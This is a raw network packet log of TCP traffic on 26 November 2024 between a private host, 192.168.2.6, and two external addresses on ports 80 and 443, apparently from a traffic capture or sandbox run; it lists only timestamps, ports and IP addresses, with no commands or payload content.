Nov 26, 2024 00:25:43.889681101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.890836954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.890856028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.890916109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.890916109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.891913891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.892046928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.892090082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.893130064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.893177986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.893299103 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.893433094 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.894288063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.894331932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.894396067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.894434929 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.895482063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.895539045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.895596027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.895641088 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.896646976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.896761894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.896924973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.896970034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.897933960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.897980928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.898179054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.898228884 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.899065018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.899107933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.899235964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.899281025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.900252104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.900315046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.900335073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.900368929 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.901523113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.901534081 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.901577950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.902683973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.902746916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.902806044 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.903011084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.903835058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.903882027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.903896093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.903920889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.905051947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.905106068 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.905164003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.905206919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.906208992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.906363964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.906423092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.907390118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.907435894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.907495975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.907546997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.908505917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.908577919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.908618927 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.908799887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.909728050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.909794092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.909810066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.909849882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.910969973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.911015034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.911303997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.911387920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.912266016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.912276983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.912327051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.913273096 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.913342953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.913417101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.913470030 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.914450884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.914568901 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.914741039 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.914807081 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.915697098 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.915781021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.915797949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.915823936 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.916850090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.916935921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.916963100 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.916976929 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.918004990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.918056011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.918109894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.918147087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.919254065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.919332027 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.919361115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.919444084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.920419931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.920478106 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.920545101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.920588970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.921617031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.921628952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.921665907 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.922765970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.922812939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.922915936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.922970057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.923971891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.923984051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.924024105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.924046040 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.925168991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.925255060 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.925267935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.925430059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.926357031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.926412106 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.926485062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.926534891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.927601099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.927653074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.927699089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.927992105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.928694963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.928796053 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.928904057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.929105997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.929909945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.929950953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.930073977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.930165052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.931142092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.931152105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.931212902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.932491064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.932502031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.932542086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.932563066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.933496952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.933552027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.933599949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.934672117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.934680939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.934732914 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.934756994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.934900999 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.934928894 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.934972048 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.934998035 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.935009956 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.935040951 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.935832024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.935883045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.935914040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.936064005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.937066078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.937078953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.937124968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.938193083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.938260078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.938319921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.938374043 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.940120935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.940140963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.940176010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.940205097 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.941030979 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.941040993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.941103935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.941714048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.941776991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.949911118 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.949950933 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.949999094 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.950005054 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.950035095 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.950076103 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.965946913 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.965976954 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.966039896 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.966044903 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.966080904 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.966104031 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.980758905 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.980792046 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.980882883 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.980907917 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.981005907 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.988987923 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.989017963 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.989084005 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.989089966 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.989140034 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.996881962 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.996912003 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.997009039 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.997031927 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.997136116 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.002393007 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.002432108 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.002480984 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.002502918 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.002520084 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.002526999 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.002950907 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.002962112 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.002975941 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.079984903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.080177069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.080497980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.080511093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.080573082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.080874920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.080888033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.080925941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.082076073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.082088947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.082158089 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.083115101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.083180904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.083237886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.084311008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.084357023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.084408998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.084534883 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.085467100 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.085571051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.085602999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.085623980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.086641073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.086693048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.086766958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.086803913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.087821960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.087892056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.087961912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.088195086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.088967085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.089011908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.089088917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.089236975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.090146065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.090325117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.090375900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.091350079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.091389894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.091449976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.091485023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.092511892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.092552900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.092606068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.092641115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.093710899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.093776941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.093815088 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.094858885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.094969034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.095015049 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.096020937 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.096069098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.096108913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.096143961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.097173929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.097233057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.097275019 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.097307920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.098413944 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.098424911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.098462105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.098496914 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.099564075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.099612951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.099697113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.099736929 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.100821018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.100867987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.100935936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.101038933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.101939917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.101953030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.101999998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.103080034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.103132963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.103300095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.103410959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.104227066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.104276896 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.104343891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.104500055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.105432034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.105493069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.105525970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.105779886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.106653929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.106663942 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.106703997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.107817888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.107868910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.107877970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.108104944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.108952999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.109108925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.109157085 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.110177994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.110189915 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.110249996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.111340046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.111351013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.111392975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.111412048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.112538099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.112550974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.112618923 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.113702059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.113727093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.114113092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.114867926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.115032911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.115082026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.116080999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.116091967 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.116128922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.116147995 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.117163897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.117219925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.117263079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.117480040 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.118324995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.118428946 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.118607998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.118689060 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.119499922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.119724035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.119795084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.120666981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.120846987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.120886087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.121052027 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.121872902 CET	80	49795	185.215.113.206	192.168.2.6
